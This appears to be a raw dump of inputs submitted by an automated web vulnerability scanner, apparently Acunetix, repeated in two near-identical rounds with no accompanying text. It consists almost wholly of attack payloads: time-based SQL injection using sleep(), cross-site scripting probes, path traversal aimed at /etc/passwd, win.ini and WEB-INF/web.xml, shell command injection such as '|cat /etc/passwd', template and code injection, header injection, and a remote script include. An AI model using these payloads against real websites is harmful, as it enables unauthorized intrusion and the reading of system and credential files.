(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

`cat /etc/passwd`

1<img/src=">" onerror=alert(969987)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1

1<ScRiPt%20>prompt(917711)</sCripT>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

1

)

1&n933531=v940941

1some_inexistent_file_with_long_name%00.jpg

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

-1)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(998519) //\xf6>

/etc/passwd

'"()

1

1

testasp.vulnweb.com

-1))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(996778)>

^(#$!@#$)(()))******

0QUnKWDD'

'

1

1

1

'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

xfvbI4YV')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

1_c5CwT <ScRiPt >prompt(951032)</ScRiPt>

||cat /etc/passwd

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

ZAp2xhjw'))

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitSPKtgGTBXo.bxss.me/

1

&dir

1

1

1

comments

1

-1

1

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

-1)

'"

1

file:///etc/passwd

http://www.acunetix.tst

1

1

-1))

1

"&dir&"

comments/.

Vzv0S78o'

/\../\../\../\../\../\../\../etc/passwd

<!--

1'"()&%<ScRiPt >prompt(991898)</ScRiPt>

1

1

1

|dir

o7T2q1yd')

1

'"()&%<ScRiPt >prompt(936731)</ScRiPt>

1

WEB-INF/web.xml

1

'|dir

1

WG361nEO'))

1

1

1_957391

1

"|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acu3602\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3602

../../../../../../../../../../windows/win.ini.jpg

1

acux3527\xc0\xbez1\xc0\xbcz2a\x90bcxuca3527

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(988790)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(922548)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(924115)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990177></ScRiPt>

1

1

1<ScRiPt >prompt(945559)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9471390*9685782)

1<video><source onerror="javascript:prompt(934720)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9471390*9685782)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907748)"></g></svg>

1

1

"+response.write(9471390*9685782)+"

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(978584))>

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

WEB-INF\web.xml

1

${100108+100040}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

'&cat /etc/passwd&'

1

1

1<body onload=prompt(966173)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948971)>

"&cat /etc/passwd&"

1

1&n913206=v938272

1some_inexistent_file_with_long_name%00.jpg

)

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(994004)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

`cat /etc/passwd`

1<img/src=">" onerror=alert(950883)>

1

^(#$!@#$)(()))******

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'"()

|cat /etc/passwd#

testasp.vulnweb.com

1

1

1

-1))

1

1<ScRiPt%20>prompt(942237)</sCripT>

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1&lt

O9Fny7YH'

'

1

1

\xf6<img acu onmouseover=prompt(964652) //\xf6>

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

"

pRxT3reu')

1

1

1<input autofocus onfocus=prompt(996870)>

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

'

oJ9PTmke'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hityFjXAbQkHE.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

"

comments

1

${@print(md5(acunetix_wvs_security_test))}\

-1

1

[url=http://www.acunetix.com]website security[/url]

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

||cat /etc/passwd

-1)

1

'"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_Okw8Z <ScRiPt >prompt(901209)</ScRiPt>

http://www.acunetix.tst

-1))

1

comments/.

1

1

1

<!--

fjRssfSs'

1

1

1'"()&%<ScRiPt >prompt(915206)</ScRiPt>

1

1

&dir

1

1

file:///etc/passwd

1

'&dir&'

'"()&%<ScRiPt >prompt(965453)</ScRiPt>

1

1

r8WKrjPD')

1

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1_920141

1

0eJuylWW'))

1

WEB-INF/web.xml

1

|dir

1

1

'|dir

WEB-INF\web.xml

1

1

acu9764\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9764

../../../../../../../../../../windows/win.ini

"|dir

1

acux4690\xc0\xbez1\xc0\xbcz2a\x90bcxuca4690

1

1<ScRiPt >prompt(960700)</ScRiPt>

../../../../../../../../../../boot.ini

1

1<script>prompt(969608)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(902733)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934940></ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt >prompt(983296)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

response.write(9101523*9274712)

1<video><source onerror="javascript:prompt(997167)">

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(900683)"></g></svg>

'+response.write(9101523*9274712)+'

1

1

1

1<div style=width:expression(prompt(951714))>

"+response.write(9101523*9274712)+"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1

1<body onload=prompt(922408)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958573)>

${100048+99113}

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(963991)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF\web.xml